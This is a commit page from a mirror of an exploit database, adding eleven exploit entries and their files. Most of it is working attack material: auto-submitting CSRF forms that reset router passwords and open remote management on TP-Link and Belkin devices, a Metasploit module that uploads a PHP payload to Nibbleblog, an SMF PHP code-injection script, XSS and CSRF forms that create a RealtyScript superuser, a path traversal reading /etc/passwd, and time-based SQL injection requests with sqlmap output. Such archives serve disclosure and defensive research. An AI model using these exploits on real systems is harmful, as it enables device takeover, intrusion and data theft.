bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-20

Browse source 
11 new exploits
This commit is contained in:
Offensive Security 2015-10-20 05:02:09 +00:00
parent cf23aa54a7
commit 6f9c84b590
12 changed files with 595 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -34762,3 +34762,14 @@ id,file,description,date,author,platform,type,port
38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload Vulnerability",2015-10-19,metasploit,php,remote,0
38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0
38491,platforms/php/webapps/38491.php,"SMF 'index.php' HTML injection and Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross Site Request Forgery Vulnerability",2013-04-24,"Jacob Holcomb",hardware,remote,0
38493,platforms/hardware/remote/38493.txt,"Cisco Linksys WRT310N Router Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,remote,0
38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin Remote PHP Code Execution Vulnerability",2013-04-24,anonymous,php,webapps,0
38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0

Can't render this file because it is too large.

7
platforms/hardware/remote/38492.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59442/info
The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
d> <title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="CSRFxssPWN" action="http://ww.example.com/apply.cgi" method="post"/> <input type="hidden" name="submit_button" value="Management"/> <input type="hidden" name="action" value="Apply"/> <input type="hidden" name="PasswdModify" value="1"/> <input type="hidden" name="http_enable" value="1"/> <input type="hidden" name="wait_time" value="0"/> <input type="hidden" name="http_passwd" value="ISE_1337"/> <input type="hidden" name="http_passwdConfirm" value="ISE_1337"/> <input type="hidden" name="_http_enable" value="1"/> <input type="hidden" name="remote_management" value="1"/> <input type="hidden" name="remote_upgrade" value="1"/> <input type="hidden" name="remote_ip_any" value="1"/> <input type="hidden" name="http_wanport" value="1337"/> <input type="hidden" name="upnp_enable" value="1"/> <input type="hidden" name="upnp_config" value="1"/> <input type="hidden" name="upnp_internet_dis" value="1"/> </form> <script> function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025); </script> <body> </html>

7
platforms/hardware/remote/38493.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59445/info
The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.
Successful exploits will cause the device to crash, denying service to legitimate users.
http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1

7
platforms/hardware/remote/38495.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59476/info
Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.
<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>

29
platforms/hardware/webapps/38488.txt Executable file
View file

@ -0,0 +1,29 @@
# Title: Path Traversal Vulnerability
# Product: Belkin Router N150
# Author: Rahul Pratap Singh
# Website: https://0x62626262.wordpress.com
# Contact:
Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
Twitter: @0x62626262
# Vendor Homepage: http://www.belkin.com
# Firmware Tested: 1.00.08, 1.00.09
# CVE: 2014-2962
Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.
A patch was released by Belkin but that is still vulnerable.
POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/

13
platforms/multiple/dos/38490.txt Executable file
View file

@ -0,0 +1,13 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=547
If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.
A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".
This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.
One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38490.zip

160
platforms/php/remote/38489.rb Executable file
View file

@ -0,0 +1,160 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Nibbleblog File Upload Vulnerability',
'Description' => %q{
Nibbleblog contains a flaw that allows a authenticated remote
attacker to execute arbitrary PHP code. This module was
tested on version 4.0.3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'References' =>
[
['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
],
'DisclosureDate' => 'Sep 01 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Nibbleblog 4.0.3', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def check
cookie = do_login(username, password)
return Exploit::CheckCode::Detected unless cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'cookie' => cookie,
'vars_get' => {
'controller' => 'settings',
'action' => 'general'
}
)
if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def do_login(user, pass)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin.php')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
vprint_status("#{peer} - Logging in...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass
}
)
return session_cookie if res && res.code == 302 && res.headers['Location']
nil
end
def exploit
unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)
print_error("Target does not appear to be vulnerable.")
return
end
vprint_status("#{peer} - Authenticating using #{username}:#{password}")
cookie = do_login(username, password)
fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
vprint_good("#{peer} - Authenticated with Nibbleblog.")
vprint_status("#{peer} - Preparing payload...")
payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
data = Rex::MIME::Message.new
data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
data.add_part('My image', nil, nil, 'form-data; name="title"')
data.add_part('4', nil, nil, 'form-data; name="position"')
data.add_part('', nil, nil, 'form-data; name="caption"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
data.add_part('1', nil, nil, 'form-data; name="image_resize"')
data.add_part('230', nil, nil, 'form-data; name="image_width"')
data.add_part('200', nil, nil, 'form-data; name="image_height"')
data.add_part('auto', nil, nil, 'form-data; name="image_option"')
post_data = data.to_s
vprint_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin.php'),
'vars_get' => {
'controller' => 'plugins',
'action' => 'config',
'plugin' => 'my_image'
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') )
fail_with(Failure::Unknown, 'Unable to upload payload.')
end
vprint_good("#{peer} - Uploaded the payload.")
php_fname = 'image.php'
payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
vprint_status("#{peer} - Parsed response.")
register_files_for_cleanup(php_fname)
vprint_status("#{peer} - Executing the payload at #{payload_url}.")
send_request_cgi(
'uri' => payload_url,
'method' => 'GET'
)
end
end

23
platforms/php/webapps/38487.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/59371/info
The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:
1. A cross-site scripting vulnerability
2. A path-disclosure vulnerability
3. Multiple content-spoofing vulnerabilities
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Content spoofing:
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
Cross-site scripting:
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

42
platforms/php/webapps/38491.php Executable file
View file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/59409/info
SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application.
SMF 2.0.4 is vulnerable; other versions may also be affected.
<?php
// proof of concept that latest SMF (2.0.4) can be exploited by php injection.
// payload code must escape from \', so you should try with something like
// that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale
// parameter.
// For character_set - another story, as far as I remember, because here we
// have
// a nice stored xss. ;)
// 21/04/2013
// http://HauntIT.blogspot.com
// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch =
curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS,
"character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>

9
platforms/php/webapps/38494.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59470/info
The WP Super Cache plugin for WordPress is prone to a remote PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
WP Super Cache 1.2 is vulnerable; other versions may also be affected.
<!?mfunc echo PHP_VERSION; ?><!?/mfunc?>

183
platforms/php/webapps/38496.txt Executable file
View file

@ -0,0 +1,183 @@

RealtyScript v4.0.2 Multiple CSRF And Persistent XSS Vulnerabilities
Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version: 4.0.2
Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office, or entrepreneur to be
up and running with a real estate web site in minutes. The software
is in daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered. The issue
is triggered when input passed via the multiple parameters is not
properly sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
Tested on: Apache/2.4.6 (CentOS)
PHP/5.4.16
MariaDB-5.5.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5269
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5269.php
01.10.2015
---
Dork: "Powered by RealtyScript v4.0.2"
--------------------
Upload Stored XSS:
POST parameter: file
--------------------
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/admin/tools.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuKWlJIoMCsN4MJyN");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuKWlJIoMCsN4MJyN\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"xss_csv.csv\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\"\x3e\x3cscript\x3ealert(\"ZSL\")\x3c/script\x3e\r\n" +
"------WebKitFormBoundaryuKWlJIoMCsN4MJyN--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit XSS #1" onclick="submitRequest();" />
</form>
</body>
</html>
--------------
CSRF Add User:
--------------
<html>
<body>
<form action="http://TARGET/admin/addusers.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="package" value="3" />
<input type="hidden" name="realtor_first_name" value="Tester" />
<input type="hidden" name="realtor_last_name" value="Testowsky" />
<input type="hidden" name="realtor_company_name" value="Zero Science Lab" />
<input type="hidden" name="realtor_description" value="1" />
<input type="hidden" name="location1" value="&#13;" />
<input type="hidden" name="realtor_address" value="1" />
<input type="hidden" name="realtor_zip_code" value="2" />
<input type="hidden" name="realtor_phone" value="3" />
<input type="hidden" name="realtor_fax" value="4" />
<input type="hidden" name="realtor_mobile" value="5" />
<input type="hidden" name="realtor_e_mail" value="lab@zeroscience.mk" />
<input type="hidden" name="realtor_website" value="&#13;" />
<input type="hidden" name="realtor_login" value="Adminized" />
<input type="hidden" name="realtor_password" value="123456" />
<input type="hidden" name="realtor_password_2" value="123456" />
<input type="hidden" name="submit_realtor" value="Register" />
<input type="submit" value="Forge User" />
</form>
</body>
</html>
------------------------------
CSRF Add SUPERUSER:
Level SUPERUSER for SUPERUSER
Level Global for Administrator
------------------------------
<html>
<body>
<form action="http://TARGET/admin/editadmins.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="login" value="joxypoxy" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="level" value="SUPERUSER" />
<input type="hidden" name="submit_admin" value="Add" />
<input type="submit" value="Forge SUPERUSER" />
</form>
</body>
</html>
-----------------------------
Stored XSS:
POST parameter: location_name
-----------------------------
<html>
<body>
<form action="http://TARGET/admin/locations.php?action=add" method="POST">
<input type="hidden" name="location_name" value='"><script>confirm(2)</script>' />
<input type="hidden" name="location_parent" value="0" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit XSS #2" />
</form>
</body>
</html>
----------------------------
IFRAME Injection Stored XSS:
POST parameter: text
----------------------------
<html>
<body>
<form action="http://TARGET/admin/pages.php?action=add" method="POST">
<input type="hidden" name="menu" value="TESTINGUSIFRAME" />
<input type="hidden" name="menu2" value="" />
<input type="hidden" name="menu3" value="" />
<input type="hidden" name="menu4" value="" />
<input type="hidden" name="menu5" value="" />
<input type="hidden" name="menu6" value="" />
<input type="hidden" name="menu7" value="" />
<input type="hidden" name="menu8" value="" />
<input type="hidden" name="menu9" value="" />
<input type="hidden" name="menu10" value="" />
<input type="hidden" name="menu11" value="" />
<input type="hidden" name="menu12" value="" />
<input type="hidden" name="menu13" value="" />
<input type="hidden" name="string" value="iframe101" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="navigation" value="1" />
<input type="hidden" name="text" value='Waddudp <br /><iframe frameborder="0" height="200" name="AAA" scrolling="no" src="http://zeroscience.mk/en" title="BBB" width="200"></iframe><br />' />
<input type="hidden" name="text2" value="" />
<input type="hidden" name="text3" value="" />
<input type="hidden" name="text4" value="" />
<input type="hidden" name="text5" value="" />
<input type="hidden" name="text6" value="" />
<input type="hidden" name="text7" value="" />
<input type="hidden" name="text8" value="" />
<input type="hidden" name="text9" value="" />
<input type="hidden" name="text10" value="" />
<input type="hidden" name="text11" value="" />
<input type="hidden" name="text12" value="" />
<input type="hidden" name="text13" value="" />
<input type="hidden" name="submit" value="Add Page" />
<input type="submit" value="Submit XSS #3" />
</form>
</body>
</html>

104
platforms/php/webapps/38497.txt Executable file
View file

@ -0,0 +1,104 @@

RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities
Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version: 4.0.2
Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office, or entrepreneur to be
up and running with a real estate web site in minutes. The software
is in daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.
Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameter 'u_id' and the POST parameter 'agent[]'
is not properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: Apache/2.4.6 (CentOS)
PHP/5.4.16
MariaDB-5.5.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5270
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php
01.10.2015
--
(1)
GET /admin/users.php?req=remove&u_id=103 and (select * from (select(sleep(66)))a)-- & HTTP/1.1
(2)
POST /admin/mailer.php HTTP/1.1
Host: TARGET
Content-Length: 62
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/admin/mailer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5;
agent[]=102 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=Send
====================================== .sqlmap session output =======================================
$ sqlmap -r request1.txt -p "u_id" --dbms=MySQL --os=Linux --sql-query="SELECT @@version"
_
___ ___| |_____ ___ ___ {1.0-dev-04c1d43}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
[*] starting at 14:36:36
[14:36:36] [INFO] parsing HTTP request from 'request1.txt'
[14:36:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM)
---
[14:36:36] [INFO] testing MySQL
[14:36:36] [INFO] confirming MySQL
[14:36:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0
[14:36:36] [INFO] fetching SQL SELECT statement query output: 'SELECT @@version'
[14:36:36] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[14:36:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[14:37:03] [INFO] adjusting time delay to 2 seconds due to good response times
5.5.41-MariaDB
SELECT @@version: '5.5.41-MariaDB'
[14:38:50] [INFO] fetched data logged to text files under '/.sqlmap/output/TARGET'
[*] shutting down at 14:38:50
======================================= sqlmap session output. ======================================